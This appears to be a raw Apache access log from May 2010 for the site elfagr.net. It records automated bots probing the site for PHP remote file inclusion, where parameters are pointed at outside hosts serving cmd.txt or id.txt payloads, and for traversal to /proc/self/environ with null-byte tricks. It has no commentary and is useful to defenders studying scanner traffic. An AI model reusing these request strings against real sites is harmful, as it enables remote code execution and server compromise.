83.217.224.50 - - [06/May/2010:12:57:39 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.yajiada88.com/hid/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
83.217.224.50 - - [06/May/2010:12:57:39 -0700] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.yajiada88.com/hid/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
62.140.247.10 - - [06/May/2010:13:07:43 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:13:07:51 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:13:07:51 -0700] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:13:08:03 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:13:08:03 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:13:08:03 -0700] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:13:08:22 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:13:08:31 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:13:08:22 -0700] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:13:08:29 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:13:08:29 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:13:08:29 -0700] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:13:17:13 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:13:17:25 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.47.221.153 - - [06/May/2010:13:18:00 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
81.214.249.169 - - [06/May/2010:13:18:13 -0700] "GET /logs/access_100505.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "www.elfagr.net"
81.214.249.169 - - [06/May/2010:13:18:20 -0700] "GET /logs/access_100506.log HTTP/1.0" 200 756593 "-" "Wget/1.11.4" "www.elfagr.net"
212.47.221.153 - - [06/May/2010:13:24:55 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
212.47.221.153 - - [06/May/2010:13:24:55 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
212.47.221.153 - - [06/May/2010:13:24:55 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
94.100.90.22 - - [06/May/2010:13:27:42 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
94.100.90.22 - - [06/May/2010:13:28:21 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
93.158.149.32 - - [06/May/2010:13:34:40 -0700] "GET /index_files/filelist.xml HTTP/1.1" 200 260 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
94.100.90.22 - - [06/May/2010:13:36:56 -0700] "GET /logs/access.log/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
94.100.90.22 - - [06/May/2010:13:36:57 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
94.100.90.22 - - [06/May/2010:13:36:57 -0700] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
77.221.130.24 - - [06/May/2010:13:37:05 -0700] "GET /logs//?_PHPLIB[libdir]=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 200 5090 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
77.221.130.24 - - [06/May/2010:13:37:05 -0700] "GET /?_PHPLIB[libdir]=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
77.221.130.24 - - [06/May/2010:13:37:05 -0700] "GET /logs/access_091126.log//?_PHPLIB[libdir]=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
77.221.130.24 - - [06/May/2010:13:37:14 -0700] "GET /?_PHPLIB[libdir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
77.221.130.24 - - [06/May/2010:13:37:06 -0700] "GET /logs//?_PHPLIB[libdir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5090 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
77.221.130.24 - - [06/May/2010:13:37:06 -0700] "GET /logs/access_091126.log//?_PHPLIB[libdir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
77.221.130.24 - - [06/May/2010:13:37:06 -0700] "GET /?_PHPLIB[libdir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
77.221.130.24 - - [06/May/2010:13:37:15 -0700] "GET /logs//?_PHPLIB[libdir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 5090 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
77.221.130.24 - - [06/May/2010:13:37:15 -0700] "GET /logs/access_091126.log//?_PHPLIB[libdir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
77.221.130.24 - - [06/May/2010:13:37:15 -0700] "GET /errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
77.221.130.24 - - [06/May/2010:13:37:15 -0700] "GET /logs/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
77.221.130.24 - - [06/May/2010:13:37:15 -0700] "GET /logs/access_091126.log/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
88.191.94.188 - - [06/May/2010:13:40:47 -0700] "GET /logs/access_100114.log%20%20/solpot.html?body=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [06/May/2010:13:40:47 -0700] "GET /solpot.html?body=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [06/May/2010:13:40:47 -0700] "GET /logs/solpot.html?body=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [06/May/2010:13:41:26 -0700] "GET /solpot.html?body=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [06/May/2010:13:41:26 -0700] "GET /logs/access_100114.log%20%20/solpot.html?body=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [06/May/2010:13:41:21 -0700] "GET /logs/solpot.html?body=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
94.100.90.22 - - [06/May/2010:13:50:58 -0700] "GET /logs/access.log/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
94.100.90.22 - - [06/May/2010:13:50:51 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
94.100.90.22 - - [06/May/2010:13:50:51 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
88.191.94.188 - - [06/May/2010:14:01:47 -0700] "GET /logs/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:14:01:38 -0700] "GET /logs/access.log%20%20/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:14:01:38 -0700] "GET /dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:14:01:39 -0700] "GET /dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:14:01:39 -0700] "GET /logs/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:14:01:39 -0700] "GET /logs/access.log%20%20/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:14:03:02 -0700] "GET /logs/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:14:03:11 -0700] "GET /logs/access.log/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:14:03:02 -0700] "GET /dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:14:03:20 -0700] "GET /logs/access.log/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:14:03:20 -0700] "GET /logs/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:14:03:28 -0700] "GET /dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
94.100.90.22 - - [06/May/2010:14:07:58 -0700] "GET /index.php?option=com_rd_download&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
94.100.90.22 - - [06/May/2010:14:11:43 -0700] "GET /logs/access.log/index.php?option=com_rd_download&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
94.100.90.22 - - [06/May/2010:14:11:52 -0700] "GET /index.php?option=com_rd_download&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
94.100.90.22 - - [06/May/2010:14:11:44 -0700] "GET /logs/index.php?option=com_rd_download&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
212.47.221.153 - - [06/May/2010:14:16:58 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
212.47.221.153 - - [06/May/2010:14:18:56 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
212.47.221.153 - - [06/May/2010:14:18:48 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
212.47.221.153 - - [06/May/2010:14:18:48 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
212.47.221.153 - - [06/May/2010:14:25:04 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
212.47.221.153 - - [06/May/2010:14:25:13 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
212.47.221.153 - - [06/May/2010:14:25:04 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
94.100.90.22 - - [06/May/2010:14:35:14 -0700] "GET /index.php?option=com_moofaq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
93.158.149.32 - - [06/May/2010:14:37:12 -0700] "GET /logs/access_100211.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
94.100.90.22 - - [06/May/2010:14:42:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
62.140.247.10 - - [06/May/2010:14:46:28 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:14:46:28 -0700] "GET /skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:14:46:37 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
94.100.90.22 - - [06/May/2010:14:50:29 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
94.100.90.22 - - [06/May/2010:14:50:21 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
94.100.90.22 - - [06/May/2010:14:50:30 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
62.140.247.10 - - [06/May/2010:14:55:30 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:14:55:30 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:14:55:39 -0700] "GET /skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:14:56:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:14:56:02 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:14:55:54 -0700] "GET /skin/zero_vote/error.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:14:56:18 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:14:56:18 -0700] "GET /skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:14:56:18 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:15:08:50 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
94.100.90.22 - - [06/May/2010:15:12:15 -0700] "GET /logs/access.log/index.php?option=com_moofaq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
94.100.90.22 - - [06/May/2010:15:12:24 -0700] "GET /index.php?option=com_moofaq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
94.100.90.22 - - [06/May/2010:15:12:24 -0700] "GET /logs/index.php?option=com_moofaq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
115.89.243.90 - - [06/May/2010:15:16:35 -0700] "GET /standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cliverichardsphotography.co.uk//components/com_spgm/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
115.89.243.90 - - [06/May/2010:15:16:35 -0700] "GET /logs//standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cliverichardsphotography.co.uk//components/com_spgm/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
115.89.243.90 - - [06/May/2010:15:16:39 -0700] "GET /logs/access.log%20%20//standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cliverichardsphotography.co.uk//components/com_spgm/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
187.45.193.159 - - [06/May/2010:15:18:10 -0700] "GET /pcltar.php?g_pcltar_lib_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
115.89.243.90 - - [06/May/2010:15:23:06 -0700] "GET /logs//standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cliverichardsphotography.co.uk//components/com_spgm/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
115.89.243.90 - - [06/May/2010:15:23:06 -0700] "GET /standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cliverichardsphotography.co.uk//components/com_spgm/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
115.89.243.90 - - [06/May/2010:15:23:06 -0700] "GET /logs/access.log//standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cliverichardsphotography.co.uk//components/com_spgm/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
187.45.193.159 - - [06/May/2010:15:34:57 -0700] "GET /logs/access.log//pcltar.php?g_pcltar_lib_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
